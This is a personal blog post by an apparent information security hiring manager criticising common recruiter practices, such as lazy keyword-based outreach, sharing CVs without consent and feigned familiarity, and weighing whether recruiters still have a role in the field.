When Two Worlds Collide: Why InfoSec Professionals Hate Recruiters

$
0
0
In honesty, I’ve never been overly fond of recruiters, stemming from my early days in the industry being duped into long journeys for interviews that were totally inappropriate, so the recruiter could make their number. However, it’s obviously unfair to tar all recruiters with the same brush, they’re just doing their job (to varying ethical and moral levels). I’m starting to see more and more posts from recruiters on LinkedIn, showing frustration at rude or terse reactions from the InfoSec community (especially Pen testers). I decided to write a post on the subject to discuss some of my thoughts on the topic and outline some of the key points on both sides, having used recruiters in my own career and also been on the hiring manager side.

What candidates need to remember is that recruiters are salespeople, they just sell people. What recruiters need to remember, is that they’re selling people and lifestyles, not things. A job is something that most of us spend a huge part of our lives doing and is therefore closely aligned to satisfying our various needs and wants. If you took the rather grim view of your life as a commodity, where you could buy and sell the hours within it, would you entrust a proportion of that to a middle-man (or woman) who is quite obviously dishonest, unethical and lazy?

Where Recruiters Go Wrong

As I start writing this section, I’m already pretty sure this is going to be the bulk of this post. I’ve experienced most of these gripes; a few on a daily basis. Some items on this list I’ve seen as a candidate and some are as a hiring manager – I don’t believe my experience is unique. I’m often pretty blunt with people who manage to reach me in these ways, mostly because I don’t agree with the approach on an ethical basis. I don’t think I’m alone.
  • Inappropriate Job Suggestions
This is really common; I think most people in InfoSec get these 2-3 times per week (if not daily). I think the thing that frustrates me most, is that it’s so obviously lazy. Our industry is obviously very security and tech savvy, we know the recruiter has done a LinkedIn keyword search and we’re one of the lucky people that popped up. Thusly follows a boiler plate email asking for a call about a role that is in no way close to what we do. The expectant chaser emails (also boiler plate) are always a nice touch.
  • Calling People in their office, often via generic or switchboard numbers
This is totally unprofessional and often leads to trouble for the candidate the recruiter is targeting – a few years ago a recruiter actually came to my desk phone via my boss, posing as a candidate, he thought he was pretty smart when he revealed his Ocean’s Eleven-esque scheme to me.
  • Sending CVs before getting permission
Again, this is totally unprofessional, not to mention in breach of the Data Protection Act. I’d recommend that if anyone discovers this is the case, that they report this as a serious matter to the agency concerned and possibly to the ICO. Moreover, part of me feels that individuals should be more cautious about who they send their CV to also. The recruiter will often try “I can’t tell you who the company is until you send me your CV”, this strict stipulation doesn’t often last long after you say you’re not interested in that case and then they spill the beans. The amusing part is that as the industry is so small, you usually know the key contact at the company and drop them a note to advise what’s happened – I’ve done this with candidates in some cases where their CV has hit my inbox in a suspicious or unsolicited fashion. I know many others who kindly do the same.
  • Cut and Paste exploratory emails
As a hiring manager I get these pretty frequently. A cut and pasted boiler plate introduction on LinkedIn about how successful the recruiter has been and how I should consider using them. They obviously really want my business and to build a relationship THAT much, they took the time to change the name at the top. If I tried to work with clients at Director level and above with this approach, I’d not last long. We’re not short of networking events, conferences etc. In my view there’s no excuse for the junk and scattergun approach.
  • Pretending they’ve spoken to you before or know you
This drives me nuts. Normally, the email (or InMail) starts “I just tried to call you” or “We spoke some time ago”, neither of which is true. It’s often a subtle reference, but for some reason some recruiters think you won’t realise. It’s such an obvious trick and for pen testers (who spend their whole day trying to think like a sneaky criminal) we spot this a mile off. Let’s at least try and start with honesty.
  • Pretending they know someone you do
Another really silly and dishonest mistake is thinking that people don’t talk to their friends. If someone says “I got your name from Ben, we’ve worked together and he told me to call you”, the first thing I’m going to do is send a message to Ben along the lines of “wtf” or “orly”. Lies and deceit are not the way to form long lasting business relationships.
  • The recruiter explains the industry to you
It’s always great to have someone with a couple of years’ experience in recruitment tell you how your job works and what people are looking for. General coaching is really useful when you’re quite junior, but a lot of people find this strange and somewhat embarrassing.
  • The recruiters job title is “Information Security Consultant” or similarly misleading
I’ve seen a few threads online where people complain about this, I tend to agree that this is a poor practice and is largely perpetuated to trick people into connecting with a recruiter, thinking they are a peer within the industry. It can be quickly remedied by viewing the person’s profile before connecting, but that doesn’t negate the dishonesty.
  • General Shenanigans
<insert horror story or anecdote>

The Other Side

Not all recruiters are bad. I’d say the good ones are certainly in the minority from my experience, but we should remember that they’re people who’re just trying to make a living too. The reality is, that recruiters aren’t going anywhere anytime soon, so we should grow thicker skins and work on solutions, rather than complaining all the time. Companies are always going to use recruiters to find talent, whether it’s to obscure their hiring activity from the public eye, save money or they just like to troll us. We can either help improve the situation or watch as it gets worse. There is actually an ombudsman in the UK for recruiting firms, called REC (https://www.rec.uk.com/membership/compliance/code-of-practice), but it requires agencies to join before they’re subject to the rules and it’s not widely mandated. I’ve also seen a recent effort from CERIS (https://www.getfeedback.com/r/1V16FODf) to create an industry body dedicated to recruitment practices within InfoSec, however, they are yet to get a proper website and talks of alignment with industry bodies such as CREST appear to have fallen down.

Room for Recruiters in InfoSec?

In smaller niches of the industry, such as penetration testing, it’s easy to think that everybody knows everybody else – so why do we need recruiters, right? Yet out of the ~1500 testers there are floating around, probably half are vaguely good (I’m being generous), then maybe a fifth of those may be open to a move at any one time. Then, there are multiple levels of seniority – and that’s only counting experienced hires. So, how do you find the good ones? Most organisations don’t have the resources or relevant skills (in their HR dept.) to search for these types of people and anecdotally speaking, they rely on  internal recommendations. As a Director (and hiring manager) of a rapidly growing large consultancy, I’d put recruiting as one of the top two priorities for me (probably only second to culture). I probably attend more than ten conferences per year (technical ones such as 44con, Kiwicon, ZeroNights, Brucon, Ruxcon, HITB, DerbyCon, BlackHat, Defcon) with one of the key goals being finding talent. I’d say that this (combined with trawling blogs / github) gets me about 75% of the way there and costs me a lot of time and my travel budget. The other 25% takes me hours of trawling LinkedIn (I don’t use external recruiters right now). For smaller organisations or more corporate ones, this simply isn’t an option, and I can see how the typical ‘pay for results’ model is appealing.

I feel there is a place for recruiters in our industry, but for nowhere near as many as there are now and they should try a lot harder to understand the different disciplines, qualifications and experience levels as well as exercising a basic level of ethics and honesty. However, I feel a lot more could be done by industry bodies to assist in this area, providing job boards and independent mechanisms for candidates to find roles.

Viewing all 22 articles
Browse latest View live